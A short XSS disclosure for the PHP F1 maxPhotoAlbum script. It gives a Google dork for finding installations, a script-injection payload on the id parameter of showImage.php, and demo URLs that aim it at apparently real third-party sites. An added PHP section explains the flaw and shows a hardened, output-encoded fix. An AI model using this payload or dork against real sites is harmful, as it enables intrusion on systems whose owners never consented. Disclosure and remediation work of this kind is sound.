
PHP F1 XSS Vulnerability

Author: wlhaan hacker, Published: 05-10-2014

Script name: PHP F1

Vendor site: http://www.phpf1.com

Download:
http://www.phpf1.com/downloads/scripts/maxPhotoAlbum.zip

Created by: wlhaan Hacker

Google dork:

"Photo Album" "Powered by PHP F1"

____________________________________

PoC:

showImage.php?id="><script>alert('XSS')</script>


http://server/path/showImage.php?id="><script>alert('XSS')</script>
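
The payload starts with `">`, which suggests the `id` value is written unencoded into a double-quoted HTML attribute. The PHP below is an added example, not maxPhotoAlbum's source: the function names and the `images/<id>.jpg` layout are assumptions. It shows that pattern beside a hardened form that validates the id and encodes it on output.

```php
<?php
// Added illustration, not the script's real code. All names are hypothetical.

// Assumed vulnerable pattern: the raw id is concatenated into a double-quoted
// attribute, so a value containing "> closes the attribute and the tag.
function renderImageVulnerable(string $id): string
{
    return '<img src="images/' . $id . '.jpg" alt="photo">';
}

// Input validation: accept only a short decimal id. Arrays (?id[]=1),
// empty strings, signs, whitespace and markup are all rejected.
function parseImageId($raw): ?int
{
    if (!is_string($raw) || !preg_match('/\A[0-9]{1,9}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Hardened form: returns [HTTP status, body]. The caller passes the status
// to http_response_code() before sending any output.
function renderImageHardened($raw): array
{
    $id = parseImageId($raw);
    if ($id === null) {
        return [400, 'Invalid image id'];
    }
    // Output encoding is kept even though $id is an int, so the template
    // stays safe if the validation rule is loosened later.
    $src = htmlspecialchars('images/' . $id . '.jpg', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return [200, '<img src="' . $src . '" alt="photo">'];
}

// Constructed sample inputs: a normal id, the string from the PoC above,
// and an array value as PHP would build it from ?id[]=1.
$samples = ['12', '"><script>alert(\'XSS\')</script>', ['1']];
foreach ($samples as $sample) {
    [$status, $body] = renderImageHardened($sample);
    echo $status, ' ', $body, PHP_EOL;
}
```

In a page handler the input would come from `$_GET['id'] ?? null`; only the first sample yields a 200 with an `<img>` tag, the other two return 400.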

Demo:

http://adpolzek.com/maxpa/showImage.php?id="><script>alert('XSS')</script>

http://theblues.theliquidloungerocks.com/BluesPhotoAlbum/showImage.php?id="><script>alert('XSS')</script



Discovered by: wlhaan hacker


https://twitter.com/waleedal3ybani

https://www.facebook.com/waleed.alaibani
